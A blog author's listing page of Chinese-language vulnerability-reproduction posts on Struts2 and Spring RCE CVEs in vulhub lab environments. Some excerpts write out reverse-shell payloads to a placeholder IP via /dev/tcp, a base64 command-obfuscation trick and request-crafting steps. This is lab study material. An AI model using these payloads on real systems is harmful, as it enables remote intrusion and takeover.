漏洞复现
文章平均质量分 65
Sarahie
这个作者很懒,什么都没留下…
展开
-
Struts2 S2-005 远程代码执行漏洞——漏洞复现
Apache Struts 2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java ServletAPI,鼓励开发者采用MVC架构。缘起于Apache Struts的WebWork框架,旨在提供相对于Struts框架的增强和改进,同时保留与Struts框架类似的结构。2005年12月,WebWork宣布WebWork 2.2以Apache Struts 2的名义合并至Struts。2007年2月第一个全发布(full release)版本释出。原创 2023-12-02 11:30:56 · 343 阅读 · 1 评论 -
Struts2 S2-001 远程代码执行漏洞——漏洞复现
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。原创 2023-12-01 16:08:07 · 112 阅读 · 1 评论 -
Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)——漏洞复现
(3)添加字段 Content-Type: application/json-patch+json。bash -c {echo,你的编码}|{base64,-d}|{bash,-i}(1)访问 http://靶场ip:8080/customers/1 进行抓包。漏洞验证之前,我们需要将要执行的命令进行Ascii转译,不然会执行不成功的.将 touch /tmp/success 进行。(4)将制作好的payload添加到最后一行。(2)转包之后将GET修改为PATCH。新建txt文件 替换空格。原创 2023-11-27 14:42:39 · 129 阅读 · 0 评论 -
Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)——漏洞复现
(new+java.lang.ProcessBuilder("bash","-c","bash+-i>%26+/dev/tcp/你的IP/21+0>%261")).start()=vulhub。等待环境启动后,访问`http://your-ip:8080`,将看到一个酒店预订的页面,这是spring-webflow官方给的简单示例。原创 2023-11-27 11:40:24 · 178 阅读 · 0 评论 -
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)——漏洞复现
bash -i >& /dev/tcp/你的ip/6666 0>&1(对这部分base64编码)原创 2023-11-27 10:18:26 · 136 阅读 · 0 评论